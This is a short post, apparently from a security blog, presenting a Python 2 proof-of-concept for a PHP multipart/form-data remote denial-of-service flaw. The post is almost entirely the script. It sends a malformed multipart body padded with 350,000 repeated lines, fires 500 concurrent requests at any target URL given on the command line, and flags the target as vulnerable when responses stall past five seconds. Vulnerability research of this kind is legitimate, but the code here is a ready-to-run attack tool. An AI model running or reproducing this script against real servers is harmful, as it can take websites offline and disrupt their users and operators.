PHP multipart/form-data Remote DOS Vulnerability

24 Dec 2015 - evi1m0

#!/usr/bin/env python
# coding : utf8
# author : evi1m0@2015
# website: www.n0tr00t.com

import sys
import datetime
import requests

import gevent
import gevent.monkey
gevent.monkey.patch_socket()


def check_vulnerability(target, body, headers):
    starttime = datetime.datetime.now()
    try:
        request = requests.post(target, body, headers=headers)
    except Exception, e:
        print '[-] Request Error: ' + str(e)
    endtime = datetime.datetime.now()
    usetime = (endtime - starttime).seconds
    if usetime > 5:
        result = '[+] {url} is vulnerability'.format(url=target)
    else:
        result = '[-] Failed'
    return result, usetime


def main(i, target):
    headers = {'Content-Type': ('multipart/form-data; boundary=----WebKit'
                                'FormBoundaryX3B7rDMPcQlzmJE1'),
               'Accept-Encoding':'gzip, deflate',
               'User-Agent': ('Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:'
                              '24.0) Gecko/20100101 Firefox/24.0')}
    body = ("------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition"
            ": form-data; name=\"file\"; filename=1.jpg")
    body = body + 'a\n' * 350000
    body = body + ('Content-Type: application/octet-stream\r\n\r\ndatadata'
                   '\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--')
    result, usetime = check_vulnerability(target, body, headers)
    print '[%s] Checking...' % str(i)
    print result
    print '[*] Response time: %s' %  str(usetime)
    return result, usetime


if __name__ == '__main__':
    if len(sys.argv) <= 1:
        print '[-] Usage: script.py target'
        sys.exit()
    if not sys.argv[1].startswith('http'):
        target = 'http://{}'.format(sys.argv[1])
    else:
        target = sys.argv[1]
    i, jobs  = 0, []
    for i in range(0, 500):
        jobs.append(gevent.spawn(main, i, target))
    gevent.joinall(jobs)
评论插件使用 Disqus ,需翻墙才能查看及留言。